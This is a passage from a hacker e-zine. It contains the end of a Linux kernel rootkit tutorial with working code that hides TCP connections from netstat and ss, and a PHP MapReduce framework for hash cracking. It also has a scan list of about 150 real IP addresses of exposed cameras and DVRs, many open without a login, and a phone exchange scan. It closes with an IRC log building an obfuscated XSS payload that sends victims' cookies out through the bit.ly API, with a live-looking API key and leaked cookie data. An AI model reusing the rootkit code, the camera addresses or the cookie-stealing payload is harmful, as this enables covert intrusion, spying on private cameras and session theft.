1335. pointers to the data structures representing the /proc/net directory and our new tcp entry within
1336. it. Simply invoke the appropriate functions when initializing the Loadable Kernel Module. The
1337. module_init macro tells the compiler which function to execute when using insmod on the compiled .ko
1338. (kernel object) code file.
1339.  
1340. static int __init init_hidetcp(void)
1341. {
1342. proc_net_remove(&init_net, "tcp");
1343. tcp_proc_register(&init_net, &tcp4_seq_afinfo);
1344.  
1345. return 0;
1346. }
1347.  
1348. module_init(init_hidetcp);
1349.  
1350. Let's go ahead and test it out to make sure everything works. After compiling the rootkit itself
1351. with GNU make and inserting the module into the kernel, we'll use netstat with the "-tW" command
1352. line flags so only TCP connections are displayed and the wide display format will allow us to view
1353. DNS hostnames in their entirety. One of the hidden port numbers we defined in the hidden_ports array
1354. was 7777 so let's see if netstat detects a connection on that port.
1355.  
1356. $ gmake
1357. $ insmod hidetcp.ko
1358. $ telnet us.undernet.org 7777
1359. Trying 208.83.20.130...
1360. Connected to us.undernet.org
1361. Escape character is '^]'.
1362. ^]
1363. telnet> z
1364. [1]+ Stopped telnet us.undernet.org 7777
1365. $ netstat -tW
1366. Active Internet connections (w/o servers)
1367. Proto Recv-Q Send-Q Local Address Foreign Address State
1368. tcp 0 0 alien.localdomain:51889 please.dont.hacktheinter.net:6697 ESTABLISHED
1369. $
1370.  
1371. So far, we've seen how to hide TCP connections to or from certain port numbers from userland
1372. programs that read from procfs. However, there's another way to access information about TCP
1373. connections using rtnetlink(3). You can determine if a given program is using procfs or a netlink
1374. protocol by tracing for the respective function calls.
1375.  
1376. $ whatis netlink
1377. netlink (3) - Netlink macros
1378. netlink (7) - Communication between kernel and userspace (AF_NETLINK)
1379. $ strace -fe trace=open,socket netstat -tW 2>&1 > /dev/null | egrep -i '(tcp|netlink)'
1380. open("/proc/net/tcp", O_RDONLY) = 3
1381. open("/proc/net/tcp6", O_RDONLY) = -1 ENOENT (No such file or directory)
1382. $ strace -fe trace=open,socket ./ss 2>&1 > /dev/null | egrep -i '(tcp|netlink)'
1383. socket(PF_NETLINK, SOCK_RAW, 4) = 3
1384.  
1385. The ss binary being traced above is a piece of code distributed with iproute2 that retrieves socket
1386. statistics. Iproute2 has a Wikipedia article at http://en.wikipedia.org/wiki/Iproute2 with some
1387. helpful links to get you up to speed.
1388.  
1389. Some have probably noticed that the raw socket option is succeeding despite the fact that my current
1390. prompt setting reflects that of a non-root user. Since the PF_NETLINK integer constant is the first
1391. argument instead of PF_INET, the kernel has no issue with providing a positive return value.
1392.  
1393. Please note that rtnetlink isn't the only netlink protocol in existence -- there are many more; far
1394. too many to mention here. There have been many academic research papers published on the subject of
1395. netlink over the past decade or so. One of the latest and most interesting is entitled
1396. "Communicating between the kernel and user-space in Linux using Netlink sockets" by Ayuso, Gasca and
1397. Lefevre. The types of security-related operations it's capable of performing alone are extremely
1398. comprehensive. For instance: detecting and mitigating DDoS attacks, subliminal channels between
1399. processes with disparate privileges, multicasting a single communications channel to multiple system
1400. users, implementing a dynamic routing protocol like Open Shortest Path First in userland, detecting
1401. network interfaces with promiscuous mode enabled, etc.
1402.  
1403. In this particular scenario, usage of only a specific aspect of netlink is necessary to accomplish
1404. the final goal of TCP connectivity that's as low-key as possible. Since connections hidden from
1405. /proc/net/tcp can still be viewed via the netlink socket interface, another technique must be used
1406. to avoid such disclosure. Here's another example typescript (`man script`) of the ss program from
1407. the misc directory in iproute2's source tree as it executes on the standard output stream:
1408.  
1409. $ ./ss
1410. State Recv-Q Send-Q Local Address:Port Peer Address:Port
1411. ESTAB 0 0 192.168.1.100:56921 72.14.204.147:80
1412. ESTAB 0 0 192.168.1.100:51237 184.27.36.110:22
1413.  
1414. In this case, the two TCP sockets listed are both in a connection established state. The four empty
1415. message queue values being shown mean that the kernel has delivered all pending data transmissions
1416. to and from the socket as of the current runtime. The code that handles Internet diagnostics
1417. monitoring for the Linux kernel's rtnetlink protocol is located in /usr/src/linux/net/ipv4/inet_diag.c,
1418. and /usr/src/linux/include/linux/inet_diag.h is of course the associated header file. TCP-specific
1419. code is located elsewhere. However, we can simply disable all TCP socket diagnostics without
1420. referencing any of the tcp_inet_diag oriented source files. The following short code snippet
1421. inserted into the rootkit module's initialization function is sufficient to prevent netlink from
1422. utilizing any TCP socket monitoring methods whatsoever:
1423.  
1424. static struct inet_diag_handler h;
1425.  
1426. h.idiag_type = TCPDIAG_GETSOCK;
1427.  
1428. inet_diag_unregister(&h);
1429.  
1430. Don't forget to include linux/inet_diag.h. Now iproute2's ss binary won't output any TCP connections
1431. at all, since the handler responsible for the message type it was processing has now been removed.
1432. It works, but it would be even better by only allowing Internet socket diagnostics for connections
1433. whose source and destination port numbers don't match our blacklist. The full inet_diag_handler
1434. structure must be filled out, and inet_diag_register should be invoked as well. This is similar to
1435. passing the tcp_seq_afinfo structure to tcp_proc_register as outlined in the previous technique. A
1436. brief outline tracing nested structure members back to actual port values follows. However, putting
1437. that concept into compilable rootkit source code form will be left as an exercise for the reader.
1438.  
1439.  
1440. include/net/inet_sock.h
1441. 112 struct inet_sock {
1442. 113 __be16 inet_dport;
1443. 114 __be16 inet_sport;
1444. 115 }
1445.  
1446. include/net/inet_connection_sock.h
1447. 86 struct inet_connection_sock {
1448. 87 /* inet_sock has to be the first member! */
1449. 88 struct inet_sock icsk_inet;
1450.  
1451. include/linux/tcp.h
1452. 292 struct tcp_sock {
1453. 293 /* inet_connection_sock has to be the first member of tcp_sock */
1454. 294 struct inet_connection_sock inet_conn;
1455.  
1456. net/ipv4/tcp_diag.c
1457. 20 static void tcp_diag_get_info(struct sock *sk, struct inet_diag_msg *r,
1458. 21 void *_info)
1459. 22 {
1460. 23 const struct tcp_sock *tp = tcp_sk(sk);
1461.  
1462.  
1463. For more information on Linux kernel development, check out:
1464. - The Linux Kernel Newbies site http://kernelnewbies.org/
1465. - The linux-kernel mailing list FAQ http://www.tux.org/lkml/
1466. - The Linux Kernel Hackers' Guide from the Linux Documentation Project
1467. http://tldp.org/LDP/khg/HyperNews/get/khg.html (highly recommended)
1468. - And, of course, the main Linux Kernel Archives site http://kernel.org
1469.  
1470.  
1471. [==================================================================================================]
1472.  
1473. -=[ 0x08 High Performance Hash Cracking with MapReduce, Part 2
1474. -=[ Author: elchupathingy
1475.  
1476. -=[ IRC: irc.gonullyourself.org #gny
1477.  
1478.  
1479. /----------------------------------------------------------------------------------------
1480. |
1481. | Introduction
1482. |
1483.  
1484. The last article talked about the basic theory of MapReduce and a few examples of how it can be
1485. used. The options for MapReduce are not limited to those mentioned, but they are the easiest ones
1486. to understand the concept of breaking up larger tasks and passing this information on to other
1487. nodes. For this article, we will focus more on the code aspect of MapReduce instead of the higher-
1488. level concepts.
1489.  
1490.  
1491. /----------------------------------------------------------------------------------------
1492. |
1493. | Background
1494. |
1495.  
1496. The very basic implementation of MapReduce shown here is something that can be expanded upon
1497. easily. It provides the method of automatic data pre-processing and automatic post-processing.
1498. But, being a simple implementation, there are problems with some of the mechanics inside the code.
1499. Though, that is left to someone else to fix. By familiarizing yourself with the algorithm, and
1500. stepping through the code, it should be a trivial manner to have yourself a fully functioning
1501. MapReduce implementation.
1502.  
1503.  
1504. /----------------------------------------------------------------------------------------
1505. |
1506. | Theory
1507. |
1508.  
1509. To recap: The idea behind MapReduce is quite simple to grasp, but its layout is detailed and may
1510. lead to confusion at times. Here is a look at a typical layout of a MapReduce network:
1511.  
1512. /----------------------------------------------\
1513. /------\ | | | | | |
1514. |Master|----/ /------\ /------\ /------\ /------\ /------\
1515. \------/ |Mapper| |Mapper| |Mapper| |Mapper| |Mapper|
1516. \------/ \------/ \------/ \------/ \------/
1517. | | | | |
1518. | | | | |
1519. /-------\ /-------\ /-------\ /-------\ /-------\
1520. |Reducer| |Reducer| |Reducer| |Reducer| |Reducer|
1521. \-------/ \-------/ \-------/ \-------/ \-------/
1522. | | | | |
1523. \ \ | / /
1524. \ \ | / /
1525. \ \ | / /
1526. \ \ | / /
1527. \ \ | / /
1528. \ \ | / /
1529. \ \ | / /
1530. \ \ | / /
1531. \ \ | / /
1532. \ \|/ /
1533. \ | /
1534. \-----------------/
1535. |
1536. /---------\
1537. |Answer!!!|
1538. \---------/
1539.  
1540. Now that's a picture. This network layout has two key characteristics to it:
1541.  
1542. 1) Series of Mappers
1543. 2) Series of Reducers
1544.  
1545. These two things are the meat of the MapReduce concept. Now, what exactly is MapReduce? It's
1546. formally defined as the following:
1547.  
1548. /------------------------------------------------------------------------------------
1549. |MapReduce is a framework for processing huge datasets on certain kinds of
1550. |distributable problems using a large number of computers (nodes), collectively
1551. |referred to as a cluster. Computational processing can occur on data stored either
1552. |in a filesystem (unstructured) or within a database (structured).
1553. | - Wikipedia
1554.  
1555. Now that that's out of the way, lets move onto real code and see how this works in the given
1556. implementation.
1557.  
1558. Firstly, what software is providing the backend infrastructure?
1559.  
1560. The implementation relies on the following:
1561.  
1562. Web server: Apache or whatever you have as long as it supports PHP.
1563. MySQL
1564.  
1565. That's it. The clients run from php-cli but can also be called by the web server if desired.
1566.  
1567. The MySQL tables that the scripts interact with are very simple:
1568.  
1569. /------------------------------------------------------------------------------------
1570. | CREATE TABLE IF NOT EXISTS `node` (
1571. | `id` varchar(32) NOT NULL,
1572. | `type` int(11) NOT NULL,
1573. | `job_id` varchar(32) NOT NULL,
1574. | `last_connect` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
1575. | UNIQUE KEY `id` (`id`)
1576. | ) ENGINE=MyISAM DEFAULT CHARSET=latin1;
1577. |
1578. | CREATE TABLE IF NOT EXISTS `job` (
1579. | `id` varchar(32) NOT NULL,
1580. | `status` int(11) NOT NULL,
1581. | `time_added` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
1582. | `mappers` int(11) NOT NULL,
1583. | `reducers` int(11) NOT NULL,
1584. | `time_started` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
1585. | PRIMARY KEY (`id`)
1586. | ) ENGINE=MyISAM DEFAULT CHARSET=latin1;
1587. |
1588.  
1589. These tables provide the necessary framework for this given implementation, while demonstrating
1590. simple MapReduce structure in an obvious yet functional manner. Should MapReduce be used in a
1591. production environment, a more efficient, scientifically-designed framework should be used. High
1592. performance applications should most likely not be using an interpreted language, additionally.
1593.  
1594. Obviously, these tables are of no use without the scripts that interact with the database. The
1595. main script that facilitates this interaction is 'stat.php'. It provides a vector for the nodes to
1596. talk with the master, in most cases, it keeps track of the nodes' last connect time and assigns the
1597. job of either 'mapper' or 'reducer' to each. The code is straightforward, and the source code
1598. should be relatively self-explanatory by scanning over it. So, the next step is to determine the
1599. method of relaying data between master and node. The data is structured in EL markup files, which
1600. look suspiciously similar to existing markup languages like HTML and XML:
1601.  
1602. /------------------------------------------------------------------------------------
1603. | <EL>
1604. | <id>ec366edc8a513f467af89f2e5cd9f37a</id>
1605. | <type>SET</type>
1606. | <payload name="job_id">
1607. | 85103e20ac8441af181b15f58fc53b08
1608. | </payload>
1609. | </EL>
1610. |
1611.  
1612. The "id" tag contains the ID of the node. The "type" tag tells the node to perform a specific
1613. action, in this case, to set its "job_id" to the payload. The "payload" tag holds the data that
1614. will be assigned to a variable stored on the node. It is named such that the variable is assigned
1615. correctly. In this particular packet, the information between the opening and closing "payload"
1616. tags is an MD5 hash, though it does not always have to be. However, protocol defines that the
1617. payload must only be alphanumeric (only contains numbers or letters). If the "type" tag is set to
1618. "FILE", then the payload should be treated as Base64-encoded data. This protocol is simple but
1619. allows for easy parsing and greater flexibility.
1620.  
1621. Here is an example handshake performed between node and master. This handshake is initiated by
1622. a node upon startup to seek new jobs:
1623.  
1624. /---------------------------------------------------------------------------------------------\
1625. |http://127.0.0.1/map_reduce_zine/stat.php?id=ec366edc8a513f467af89f2e5cd9f37a&status=starting|
1626. \---------------------------------------------------------------------------------------------/
1627. |
1628. |
1629. /-------------------------------------------------\
1630. | <EL> |
1631. | <id>ec366edc8a513f467af89f2e5cd9f37a</id> |
1632. | <type>REQUEST</type> |-----------------------\
1633. | </EL> | |
1634. \-------------------------------------------------/ |
1635. |
1636. |
1637. /--------------------------------------------------------------------------------------------\
1638. |http://127.0.0.1/map_reduce_zine/stat.php?id=ec366edc8a513f467af89f2e5cd9f37a&status=whatami|
1639. \--------------------------------------------------------------------------------------------/
1640. |
1641. |
1642. /-------------------------------------------------\
1643. | <EL> |
1644. | <id>ec366edc8a513f467af89f2e5cd9f37a</id> |
1645. | <type>SET</type> |
1646. | <payload name="type"> |
1647. | reducer |-----------------------\
1648. | </payload> | |
1649. | </EL> | |
1650. \-------------------------------------------------/ |
1651. |
1652. |
1653. /--------------------------------------------------------------------------------------------\
1654. |http://127.0.0.1/map_reduce_zine/stat.php?id=ec366edc8a513f467af89f2e5cd9f37a&status=looking|
1655. \--------------------------------------------------------------------------------------------/
1656. |
1657. |
1658. /-------------------------------------------------\
1659. | <EL> |
1660. | <id>ec366edc8a513f467af89f2e5cd9f37a</id> |
1661. | <type>SET</type> |
1662. | <payload name="job_id"> |
1663. | 85103e20ac8441af181b15f58fc53b08 |
1664. | </payload> |
1665. | </EL> |
1666. \-------------------------------------------------/
1667.  
1668. Once the node has received a job, it will send another request to the master for the script and
1669. data files. The job files, which contain the split up work, are then stored in a folder specific to
1670. that job_id. To retrieve jobs files from the folder, the follow script is used:
1671.  
1672. /------------------------------------------------------------------------------------
1673. |#job_chunks.php
1674. |$dir = opendir( "./chunks/$job_id" );
1675. |
1676. |if( $dir )
1677. |{
1678. | do
1679. | {
1680. | $thing = readdir( $dir );
1681. |
1682. | if( $thing == FALSE )
1683. | {
1684. | rmdir( "./chunks/$jobs_id" );
1685. | die;
1686. | }
1687. |
1688. | if( $thing == "." || $thing == ".." )
1689. | continue;
1690. | else
1691. | break;
1692. |
1693. | }while( true );
1694. |
1695. | if( $thing && $thing != "." && $thing != ".." )
1696. | {
1697. | $output = "<EL>\r\n";
1698. | $output .= "\t<id>$id</id>\r\n";
1699. | $output .= "\t<type>FILE</type>\r\n";
1700. | $output .= "\t<payload name=\"chunk\">\r\n";
1701. | $output .= "\t\t".base64_encode( file_get_contents( "./chunks/$job_id/$thing" ) )."\r\n";
1702. | $output .= "\t</payload>\r\n";
1703. | $output .= "</EL>";
1704. | unlink( "./chunks/$job_id/$thing" );
1705. | closedir( $dir );
1706. | echo $output;
1707. | }
1708. |}
1709. |
1710.  
1711. This code grabs the next chunk from the directory and wraps it as a EL packet, where the output
1712. is then sent to the node.
1713.  
1714. From here, mapper nodes will process this chunk of data and start a small, one-time use web
1715. server. The reducer nodes request the IP:PORT of a mapper node, grabbing the result. After doing
1716. so, they further process the data and upload their results to the master.
1717.  
1718. The master does a final reduction step on the reduced results and produces a final, usable
1719. result that is downloaded by the administrator.
1720.  
1721. Although very much functional, the implementation that is given with this article possesses a
1722. few inherent issues:
1723.  
1724. 1) If a node does not complete a job, then that node's results are lost.
1725. 2) There is no redundancy of nodes.
1726. 3) The code as a whole was not written with security in mind. Testing should only be
1727. performed on a private network.
1728. 4) It uses HTTP to transfer messages, which makes the code easy to write in exchange for
1729. introducing an enormous amount of overhead.
1730. 5) Speed gains from distributing the cracking process among multiple nodes is negated by the
1731. fact that nodes request chunks more quickly than other nodes are able to download them,
1732. resulting in multiple nodes receiving the same chunk. Requesting a chunk is not a
1733. "blocking" operation. This resulted in a dirty code hack using random sleep times.
1734.  
1735. With that being said, this project still serves as a good learning tool to those interested in
1736. the MapReduce algorithm.
1737.  
1738. Download the source package for this article:
1739. http://www.gonullyourself.org/zine/4/MapReduce.tar.gz
1740.  
1741. MD5sum: d985ffa4b2fcd63d2a6275697acf252e
1742. SHA1sum: fb798594216e87b51fd194db1a31e580ebe47a7d
1743.  
1744. A few things need to be done first before testing this code. First, the config.ini files should
1745. be updated to point to the URL of your web server and the folder the MapReduce code is installed in.
1746. The default is "http://127.0.0.1/map_reduce_zine". Once the configs have been updated correctly,
1747. the nodes are ready to run; however, the master must be set up first. Import and create the tables
1748. in map_reduce.sql. To make sure the master runs without problems, just be lazy and chmod 777 all
1749. the directories. For what we're doing, it really doesn't matter. Now, all the configurations are
1750. complete. To test the MapReduce cluster, initialize two or more nodes locally by running the
1751. "client.php" file in each of the "testing" folders. Once they are running, they will begin to poll
1752. the master for work.
1753.  
1754. To add a job to the cluster, navigate to "add_job.php" in your browser. From here, add the
1755. corresponding files from the "example" directory. Once a job is added, the nodes will automatically
1756. grab the work script and any data needed to perform the job. Once the nodes are done with their
1757. work, they will begin to poll for new jobs. The example scripts and data are to find the plain text
1758. string "elchupathingy" from the hash in the "node_script.php". To see if it worked, browse to
1759. "show_results.php" and select the link there; it will run the "post-process" script and, in this
1760. case, display the plain text.
1761.  
1762. lata, ELChupathingy
1763.  
1764.  
1765. [==================================================================================================]
1766.  
1767. -=[ 0x09 Camera/DVR Scan
1768. -=[ Author: storm
1769.  
1770. -=[ Email: storm@gonullyourself.org
1771. -=[ Website: http://gonullyourself.org/
1772.  
1773.  
1774. Oh, the joys of nmap.
1775.  
1776. Open access (no login)
1777. ----------------------
1778.  
1779. http://165.98.238.72/view/index.shtml
1780. http://165.98.238.75/view/index.shtml
1781. http://165.98.238.78/view/index.shtml
1782. http://186.1.14.117/view/index.shtml
1783. http://24.1.5.61:8082/Simple/index.htm
1784. http://24.1.10.154:81/
1785. http://24.1.12.248:1028/
1786. http://24.1.26.48/img/main.cgi?next_file=main.htm
1787. http://72.250.135.252:1024/img/image.cgi?next_file=main_fs.htm
1788. http://74.237.69.5/main.cgi?next_file=main.htm
1789. http://83.227.138.166/main.cgi?next_file=main.htm
1790. http://75.61.194.41:1024/main.cgi?next_file=index_in.htm
1791. http://193.87.102.25/img/main.cgi?next_file=main.htm
1792. http://213.198.245.70/img/main.cgi?next_file=main.htm
1793. http://74.237.69.5/main.cgi?next_file=main2.htm
1794. http://pineairewebcam.dyndns.org/
1795. http://217.159.181.99/
1796. http://193.138.213.166/
1797. http://72.2.138.209:81/
1798. http://ajs01.dyndns.org/
1799. http://62.106.98.204/
1800. http://80.54.239.234/
1801. http://195.47.194.200/
1802. http://78.36.109.5/
1803. http://www.zodiac-bg.com/files/Jview.htm
1804. http://82.107.211.3/
1805. http://84.53.31.54/
1806. http://129.170.124.12/
1807. http://193.178.224.10/
1808. http://chrastal.homeip.net:5050/
1809. http://194.112.215.163/
1810. http://129.70.141.62/
1811. http://209.94.75.172/
1812. http://75.149.126.138:89/
1813. http://67.53.198.178/
1814. http://128.103.101.254/
1815. http://157.157.79.85/
1816. http://208.71.234.122/
1817. http://24.25.42.218:52210/
1818. http://65.182.241.193/
1819. http://216.117.210.183:86/
1820. http://203.213.212.174:1365/
1821. http://142.217.181.117:89/
1822. http://87.243.178.244/
1823. http://81.138.9.30:81/
1824. http://122.3.81.6:82/
1825. http://68.101.243.94:82/
1826. http://80.13.146.246/
1827. http://64.203.239.75/
1828. http://193.251.181.104/
1829. http://213.110.240.157/
1830. http://216.160.181.242:10083/
1831. http://67.242.57.128:86/
1832. http://www.rmackey.com/
1833. http://71.194.73.80:4343/
1834. http://209.117.235.143/
1835. http://71.157.136.110:81/
1836. http://216.129.211.131/
1837. http://217.133.212.61/
1838. http://143.107.3.149/
1839. http://210.230.126.237:82/
1840. http://62.147.232.188/
1841. http://216.137.100.129:81/
1842. http://210.230.133.76:82/
1843. http://222.3.77.52:81/
1844. http://222.11.124.75:81/
1845. http://116.64.17.198/
1846. http://210.249.10.81:81/
1847. http://220.217.129.21:81/
1848. http://210.249.21.157:82/
1849. http://222.1.186.218:81/
1850. http://221.119.133.176:81/
1851. http://213.160.168.72/
1852. http://61.204.127.233:82/
1853. http://222.3.114.56:81/
1854. http://71.110.145.16:89/
1855. http://89.234.195.78/
1856. http://99.135.117.196/
1857. http://65.99.253.134/
1858. http://222.11.60.180:81/
1859. http://61.117.29.119:81/
1860. http://82.176.123.82/
1861. http://66.203.223.50:82/
1862. http://24.20.88.10:84/
1863. http://24.19.205.82:8095/
1864. http://59.133.145.190:82/
1865. http://68.16.245.20/
1866. http://220.214.128.66:82/
1867. http://124.105.235.84/
1868. http://222.5.86.181:82/
1869. http://210.169.100.66:82/
1870. http://222.13.239.47:82/
1871. http://208.54.215.145/
1872. http://66.35.88.6/
1873. http://98.112.171.186:81/
1874. http://59.133.146.58:82/
1875. http://195.131.161.122:85/
1876. http://208.71.217.253:50001/
1877. http://220.217.122.193:81/
1878. http://222.15.48.210:82/
1879. http://220.217.130.205:81/
1880. http://98.190.143.254:23/
1881. http://200.124.240.142:8086/
1882. http://70.154.139.169:83/
1883. http://205.250.69.239:81/
1884. http://124.45.116.105:81/
1885. http://61.204.122.175:82/
1886. http://173.46.175.162:32000/
1887.  
1888.  
1889. Login required
1890. --------------
1891.  
1892. https://24.206.4.253/index.htm
1893. http://24.231.40.38/
1894. http://24.231.41.232/
1895. http://24.231.50.181/
1896. http://24.231.54.90/
1897. http://24.244.132.179/
1898. http://24.244.134.63/
1899. http://24.244.135.87/
1900. http://24.244.135.250/
1901. http://216.137.0.39/auth.html
1902. http://216.137.11.89/
1903. http://24.244.145.66:8080/
1904. http://24.244.145.182/
1905. http://24.244.146.129/
1906. http://24.244.146.192/
1907. http://24.244.180.229/
1908. http://64.150.197.130/
1909. http://64.150.207.20/
1910. http://64.150.210.159/
1911. http://64.150.220.6/
1912. http://64.150.220.67/
1913. http://64.150.222.210/
1914. http://64.150.231.141/
1915. http://64.150.237.8/
1916. https://64.150.238.144/auth.html
1917. http://64.150.245.160/
1918. http://65.75.92.213/
1919. http://65.75.96.59/
1920. http://65.75.107.70/
1921. http://65.75.114.105/
1922. http://65.75.115.236/
1923. http://200.4.168.164/
1924. http://200.80.109.38/
1925. http://186.1.3.18/
1926. http://186.1.3.69/
1927. http://186.1.10.155/
1928. http://190.106.11.19/
1929. http://190.106.11.20/
1930. http://190.106.14.14/
1931. http://190.106.19.67/
1932. http://190.184.94.41/
1933. http://165.98.224.67/
1934. http://165.98.235.2/
1935. http://165.98.236.114/
1936. http://186.1.14.180/
1937. http://186.1.14.181/
1938. http://186.1.14.182/
1939. http://190.106.11.18/
1940. http://190.184.23.39/
1941. http://190.184.35.95/
1942. http://190.184.40.114/
1943. http://190.184.43.97/
1944. http://190.184.45.153/
1945. http://190.184.72.105/
1946. http://190.212.134.190/
1947. http://190.212.134.242/
1948. http://196.200.49.162/
1949. http://24.1.10.135:1050/
1950. http://24.1.13.39:8080/
1951. http://24.1.16.206/
1952. http://186.1.10.156/login.html?1600&1
1953. http://190.106.4.27/
1954.  
1955.  
1956. [==================================================================================================]
1957.  
1958. -=[ 0x0a 303-833-00xx Scan
1959. -=[ Author: Shadytel, Inc
1960.  
1961. -=[ Website: http://www.shadytel.com/
1962.  
1963.  
1964. 0001 - Expanded Announcement System (no supe)
1965. 0002 - Ringout
1966. 0003 - Ringout
1967. 0004 - Ringout
1968. 0005 - Reorder via SS7?
1969. 0006 - Burst of 2200 hz
1970. 0007 - Ringout
1971. 0008 - Busy signal via distant end
1972. 0009 - 102-type milliwatt, hangs up after ~3 cycles
1973. 0010 - Same as 0009
1974. 0012 - Busy via SS7
1975. 0013 - Coin deposit rec
1976. 0018 - LD service restricted rec
1977. 0020 - Reorder via SS7
1978. 0021 - Ringout
1979. 0022 - Ringout
1980. 0030 - Ringout
1981. 0031 - Ringout
1982. 0032 - Ringout
1983. 0034 - Ringout
1984. 0035 - Ringout
1985. 0036 - Ringout
1986. 0037 - Ringout
1987. 0038 - Modem - 7/E/1,
1988. *displays TID:, then garbage, then TID too long. Please try again.*
1989. 0039 - Something picks up silently after two rings. Faint clicking noise is sometimes audible.
1990. 0041 - Ringout
1991. 0057 - 105-type test
1992. 0058 - Something via SS7? Recheck
1993. 0065 - rec, "Remember, you must dial one plus your area code, or zero plus your area code and the
1994. number for long distance and operator assisted calls."
1995. 0066 - Dialing 1/0 not necessary rec
1996. 0067 - Dial 1 first rec
1997. 0068 - 100-type milliwatt
1998. 0069 - Dialing 0 not necessary rec
1999. 0070 - YCDNGT
2000. 0075 - YCDNGT
2001. 0076 - CBCAD/call your operator to help you
2002. 0077 - CBCAD/check your instruction manual
2003. 0078 - Permanent signal rec
2004. 0080 - Low tone
2005. 0081 - Same as 0078
2006. 0082 - Coin deposit rec
2007. 0083 - LD service restricted rec
2008. 0084 - CAC error rec
2009. 0085 - Tandem CBCAD recording?
2010. 0086 - Dialing CAC not necessary rec
2011. 0087 - Network difficulties rec
2012. 0089 - CAC error rec
2013. 0090 - ACB rec
2014. 0091 - Busy via SS7
2015. 0098 - Reorder via SS7?
2016. 0099 - DATU
2017.  
2018.  
2019. [==================================================================================================]
2020.  
2021. -=[ 0x0b bit.ly Shenanigans (aka, XSS is hard bro)
2022. -=[ Author: Silks, elchupathingy
2023.  
2024. -=[ IRC: irc.gonullyourself.org #gny
2025.  
2026.  
2027. Now, while we could neatly explain how we built up our implementation of this trick, it wouldn't
2028. really capture our thought process and just general fucking around. At some point, during the early
2029. hours of the morning, I pondered the idea of grabbing a fellow #gny chatter's IP for the lulz.
2030. Knowing that JavaScript has no reliable function for retrieving a client's IP, the best approach was
2031. to use a standard whatismyip.com site to grab the IP. With the IP address theoretically in my hands,
2032. I approached elchupathingy for ideas of how to export that information without any server-side ties.
2033.  
2034. After some playing around, we came up with a solution that would gather and store a victim's IP
2035. address in a clever manner, and then redirect them to a final destination as expected. Here is our
2036. chat log (mildly edited to hide moments of stupidity) which explains how we built this up.
2037.  
2038. -Silks
2039.  
2040. Silks: do you know of a site that is like a persistent xss but not even xss?
2041. Silks: will just store info temporary
2042. Silks: like
2043. Silks: x.php?q=lolIstolethisguysip:1.1.1.1
2044. elchupathingy: could use bit.ly to store it
2045. Silks: how so
2046. elchupathingy: it stores links you shorten
2047. Silks: basically, did you see my XSS, JS+PHP implementation?
2048. elchupathingy: don't think so
2049. elchupathingy: hmm storing people's info using bit.ly is kind of sly now that i think about it
2050. elchupathingy: lol
2051. elchupathingy: http://bit.ly/gsfxLp
2052. elchupathingy: see what the link expands to
2053. Silks: how would you create that though from JS?
2054. elchupathingy: one sec
2055. elchupathingy: "http://api.bitly.com/v3/shorten?login=$bitlylogin&apiKey=$bitlyapi&format=json&longU
2056. rl=http://google.com/search?q=".shit_goes_here
2057. Silks: k
2058. elchupathingy: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895177c5be2a28cc9f0b2
2059. 52495179&format=json&longUrl=http://google.com/search?q=luls
2060. elchupathingy: just a GET or inclusion should work
2061. Silks: I guess if you can see the details in your bit.ly account that will export the info
2062. elchupathingy: http://google.com/search?q=USER:elchupathingy:PASS:lolpasssowrd
2063. elchupathingy: thats what it would look like
2064. Silks: I know man
2065. Silks: but you are ignoring the actual problem
2066. Silks: the point is, getting the data from the victims client to you
2067. Silks: so if bit.ly account store recently created urls
2068. Silks: then you can access that bit.ly and extract the info
2069. elchupathingy: ya
2070. elchupathingy: woot got the cookie via xss and bit.ly
2071. elchupathingy: lol
2072. elchupathingy: in a ungodly long xss string
2073. Silks: rofl
2074. Silks: so like
2075. elchupathingy: <script>;var x=new XMLHttpRequest();x.open(String.fromCharCode(71,69,84),String.fromC
2076. harCode(104,116,116,112,58,47,7,97,112,105,46,98,105,116,108,121,46,99,111,109,47,118
2077. ,51,47,115,104,111,114,116,101,110,63,108,111,103,105,110,61,101,108,99,104,117,112,9
2078. 7,116,104,105,110,103,1,38,97,112,105,75,101,121,61,82,95,51,49,54,56,57,53,49,55,55,
2079. 99,53,98,101,50,97,50,57,99,99,57,102,48,98,50,53,50,52,57,53,49,55,57,38,2,111,114,1
2080. 09,97,116,61,106,115,111,110,38,108,111,110,103,85,114,108,61,104,116,116,112,58,47,4
2081. 7,103,111,111,103,108,101,26,99,11,10,47,115,101,97,114,99,104,63,113,61).concat(docu
2082. ment.cookie));x.onreadystatechange=function(){};x.send();</script>
2083. elchupathingy: lol
2084. elchupathingy: ungodly long
2085. Silks: win
2086. Silks: funny thing is
2087. Silks: you can then just bit.ly that long url
2088. elchupathingy: exactly lol
2089. elchupathingy: and bit.ly will keep track of the people that click on it lol
2090. elchupathingy: at the same time of sending you their cookie
2091. Silks: guessing the api can retrieve links too
2092. Silks: so you can probably write a quick app to grab it back
2093. elchupathingy: yep
2094. elchupathingy: well what ya mean?
2095. elchupathingy: short url to the info?
2096. Silks: well
2097. Silks: say you wanna xss like 100 people
2098. Silks: everytime someone gets owned they create a new bit.ly
2099. Silks: so you write an app that connects to bit.ly api and retrieves new bit.ly's
2100. Silks: and from that grabs the redirect url and parses the data
2101. elchupathingy: maybe
2102. elchupathingy: have to look over the api real quick
2103. Silks: but yeah you can break it down to two commands
2104. elchupathingy: can get the countries for each link, statistics on number of clicks and referrrers
2105. Silks: bit_xxs_ify <data you want>
2106. Silks: spits out a bit.ly link that links to the long url
2107. Silks: I guess somehow you'd need to inject what you want
2108. Silks: like "document.cookie"
2109. Silks: or just have a menu of all the options
2110. Silks: bit_xss_ify cookie
2111. Silks: bit_xss_ify ip
2112. Silks: etc
2113. Silks: then you'd need
2114. Silks: bitly_to_data
2115. elchupathingy: ok can get the top 100 urls
2116. elchupathingy: through their api
2117. Silks: which will grab all your bit.ly urls and push new ones into db
2118. elchupathingy: http://bit.ly/fUGVEO
2119. Silks: pro stream music
2120. elchupathingy: click that wanna see if it works
2121. Silks: put it in search box
2122. Silks: didn't exe
2123. Silks: https://api-ssl.bitly.com/v3/user/clicks?access_token=BITLY_ASSIGNED_ACCESS_TOKEN&days=7
2124. Silks: oh nvm
2125. elchupathingy: nah got it
2126. elchupathingy: __qca=A0-153091312312-1291239025123263; __utmz=201001501.1201336810.6.6|utmccn=(refer
